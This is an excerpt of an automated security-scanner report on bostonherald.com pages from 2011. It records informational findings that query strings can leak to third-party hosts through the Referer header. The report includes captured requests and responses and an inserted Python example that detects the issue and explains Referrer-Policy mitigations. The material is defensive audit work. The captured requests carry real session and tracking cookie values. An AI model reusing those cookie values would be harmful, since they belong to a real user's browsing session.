<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Columnists - News &amp; Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/columnists/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/columnists/view/20110127what_next_baby_botox_little_girls_makeup_line_a_travesty/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/be916e_geo_01272011.jpg" alt="Wal-Mart&rsquo;s new GeoGirl beauty line for ages 8-12."></a>
...[SNIP]...
<a href="/news/columnists/view/20110126sorry_seems_to_be_the_hardest_word/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/0537a7_mainturner01262011.jpg" alt="NO REMORSE: Chuck Turner was found guilty of accepting a bribe, but Judge Douglas Woodlock&#x2019;s three year prison sentence was largely influenced by Turner&#x2019;s &#x2018;failure to recognize and accept responsibility.&#x2019;"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/news/columnists/view/20110126sorry_seems_to_be_the_hardest_word/srvc=col&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="/news/columnists/view/20110126sorry_seems_to_be_the_hardest_word/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20110126non-essential_how_about_non-employed/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/acd93d_ltpSnowcommute012611.jpg" alt="Pedestrians walk along Washington St. in Chinatown."></a>
...[SNIP]...
<a href="/news/columnists/view/20110126tats_life_after_the_breakup_inky_reminders_remain/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/b47004_Tat_01262011.JPG" alt="BODY Of WORK: Tattoo artist Nate stevens of stingray Body art in Allston works on a Celtic Tree of life for Kathleen Rice this week. Stevens says he tells customers not to tattoo the names of their significant others, but that few heed his advice."></a>
...[SNIP]...
<a href="/news/columnists/view/20110126only_obama_can_fix_the_state_of_our_union/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/8829cb_Obama_01262011.jpg" alt="&#x2018;WE WILL MOVE FORWARD TOGETHER&#x2019;: President Obama gestures while delivering his State of the Union address on Capitol Hill last night."></a>
...[SNIP]...
<a href="/news/columnists/view/20110125xxx-it_strategy_mitt-linked_hotel_chain_bans_adult_movies/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/9d0b32_marriot_01252011.jpg" alt="Marriott Hotel."></a>
...[SNIP]...
<a href="/news/columnists/view/20110125date_night_in_dcbipartisan_buddy_system_in_place_for_state_of_the_union/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/552423_brown_01252011.jpg" alt="Bay State Republican Sen. Scott Brown"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20110125date_night_in_dcbipartisan_buddy_system_in_place_for_state_of_the_union/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20110124some_pols_say_twitter_ban_for_the_birds/"><img src="http://multimedia.heraldinteractive.com/images/20110123/stp/a7ee69_tweet_01242011.jpg" alt="Tweeting is allegedly now frowned upon at the State House. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="/news/columnists/view/20110124some_pols_say_twitter_ban_for_the_birds/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20110123countdown_finally_runs_out_for_keith/"><img src="http://multimedia.heraldinteractive.com/images/20110122/stp/4f9728_Olbermann_01232011.jpg" alt="SIGNING OFF: Keith Olbermann, host of &#x2018;Countdown&#x2019; on MSNBC, surprised viewers Friday night by announcing he was leaving."></a>
...[SNIP]...
<a href="/news/columnists/view/20110123peace_corps_pioneers_faith_sustained_him/"><img src="http://multimedia.heraldinteractive.com/images/20110122/stp/a42f16_Pall_01232011.jpg" alt="POTOMAC PROCESSION: The casket of R. Sargent Shriver is carried into church in Potomac, Md., yesterday for a funeral Mass, escorted by son Anthony, far right, daughter Maria, left, and her husband Arnold Schwarzenegger."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20110123peace_corps_pioneers_faith_sustained_him/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20110123in_defense_of_the_proper_use_of_force/"><img src="http://multimedia.heraldinteractive.com/images/20110122/stp/bff0cd_SWAT_01232011.jpg" alt="SERVE AND PROTECT: Boston police- seen here with SWAT team members at a call in Roxbury- invited media and community activists to the BPD Academy for a hands-on demonstration."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20110123in_defense_of_the_proper_use_of_force/srvc=col&position=">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Local Coverage" /></a>
...[SNIP]...
</div>    


<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Local Politics" /></a>
...[SNIP]...
<div style="margin:0 0 20px 0; line-height:16px; width:310px">
<img style="float:left; margin:0 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif">
<span class="bold">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.279. http://www.bostonherald.com/news/columnists/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/columnists/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /news/columnists/view.bg?articleid=1312540&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Columnists - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/columnists/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview%2F20110128speak_up_sal__or_itll_be_a_long_time_in_jail%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif?1=1" alt="Howie Carr" />
                                       <span class="bold">
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1312540&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1312540&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1312540&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(149) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Speak up, Sal Dimasi&mdash; or it&rsquo;ll be a long time in jail');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1312540&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(149) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/politics/view/20110127lawyer_dimasi_bracing_for_difficult_fight/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/5ad244_sal_01272011.jpg" alt="Lawyer: Sal DiMasi bracing for &lsquo;difficult fight&rsquo;" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.280. http://www.bostonherald.com/news/international/africa/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/international/africa/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:
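The three bostonherald.com entries above (17.278, 17.279, 17.280) all record the same condition: the request URL carries a query string, and the response embeds scripts, images, iframes and links hosted on other domains. When the browser fetches those resources or follows those links it sends the page URL in the Referer header, so under the browser default of the time (no-referrer-when-downgrade) the query string reaches each third-party host. The script below is an added example, not part of the scanner report or the site's own code; it reproduces that check over a response body and shows what Referer each policy would send. The sample HTML is constructed from tags visible in the captured responses, not the full 62 KB response, and the Referrer-Policy values modelled are the legacy default, the current browser default (strict-origin-when-cross-origin, which sends only the origin cross-site) and no-referrer.

```python
"""Flag cross-domain Referer leakage in an HTTP response body.

Added example reproducing the check behind report entries 17.278-17.280:
page loaded with a query string + response references other domains.
SAMPLE_BODY is constructed from tags seen in the report, not the captured
response.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes whose value the browser fetches or navigates to, and therefore
# accompanies with a Referer header.
_URL_ATTRS = {
    "script": ("src",),
    "img": ("src",),
    "iframe": ("src",),
    "link": ("href",),
    "a": ("href",),
}


class _RefCollector(HTMLParser):
    """Collect (tag, raw url) pairs for the attributes in _URL_ATTRS."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = _URL_ATTRS.get(tag)
        if not wanted:
            return
        for name, value in attrs:
            if name in wanted and value:
                self.refs.append((tag, value))


def cross_domain_refs(page_url, body):
    """Return sorted (tag, absolute_url) pairs whose host differs from the page's."""
    page_host = (urlsplit(page_url).hostname or "").lower()
    parser = _RefCollector()
    parser.feed(body)
    found = set()
    for tag, raw in parser.refs:
        raw = raw.strip()
        # Pseudo-URLs never produce a request, so no Referer is sent.
        if raw.startswith(("javascript:", "#", "mailto:")):
            continue
        absolute = urljoin(page_url, raw)
        host = (urlsplit(absolute).hostname or "").lower()
        if host and host != page_host:
            found.add((tag, absolute))
    return sorted(found)


def referer_sent(page_url, target_url, policy="no-referrer-when-downgrade"):
    """Referer value sent from page_url to target_url under the given policy.

    Only the three policies relevant to this finding are modelled.
    """
    page, target = urlsplit(page_url), urlsplit(target_url)
    origin = f"{page.scheme}://{page.netloc}/"
    full = page._replace(fragment="").geturl()  # fragment is never sent
    same_origin = (page.scheme, page.netloc) == (target.scheme, target.netloc)
    downgrade = page.scheme == "https" and target.scheme == "http"
    if policy == "no-referrer":
        return None
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "strict-origin-when-cross-origin":
        if downgrade:
            return None
        return full if same_origin else origin
    raise ValueError(f"unmodelled policy {policy!r}")


def referer_leak_report(page_url, body):
    """Summarise the finding: the query string and the hosts that would receive it."""
    query = urlsplit(page_url).query
    hosts = sorted({urlsplit(u).hostname for _, u in cross_domain_refs(page_url, body)})
    return {
        "query_string": query,
        "external_hosts": hosts,
        "leaks_query": bool(query) and bool(hosts),
    }


# Constructed sample modelled on tags visible in the report.
SAMPLE_URL = "http://www.bostonherald.com/news/columnists/?srvc=home&position=active"
SAMPLE_BODY = """
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://cache.heraldinteractive.com/js/common.js"></script>
<a href="/news/police_logs/">Police logs</a>
<a href="javascript:void(0);">Features</a>
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html"></iframe>
<img src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" alt="Quantcast"/>
"""

if __name__ == "__main__":
    report = referer_leak_report(SAMPLE_URL, SAMPLE_BODY)
    print("query string:", report["query_string"])
    for host in report["external_hosts"]:
        print("  receives Referer:", host)
    target = "http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif"
    for policy in ("no-referrer-when-downgrade", "strict-origin-when-cross-origin", "no-referrer"):
        print(f"{policy:32} -> {referer_sent(SAMPLE_URL, target, policy)}")
```

The check is only as interesting as the query string it finds: here the parameters are navigation tracking values, which is why the scanner rates the entries Information. The same condition on a URL carrying a session token or password-reset code would be a real disclosure. Where a query string cannot be avoided, a Referrer-Policy response header (or `<meta name="referrer">`) and `rel="noreferrer"` on outbound links stop the browser from sending it cross-domain.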

Request

GET /news/international/africa/view.bg?articleid=1312633&pos=breaking HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Africa - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/international/africa/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Finternational%2Fafrica%2Fview.bg%3Farticleid%3D1312633%26srvc%3Drss%26utm_source%3Dfeedburner%26utm_medium%3Dfeed%26utm_campaign%3DFeed%253A%2Bbostonherald%252Fnews%2B%2528News%2B%2526%2BOpinion%2B-%2BBostonHerald.com%2529&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

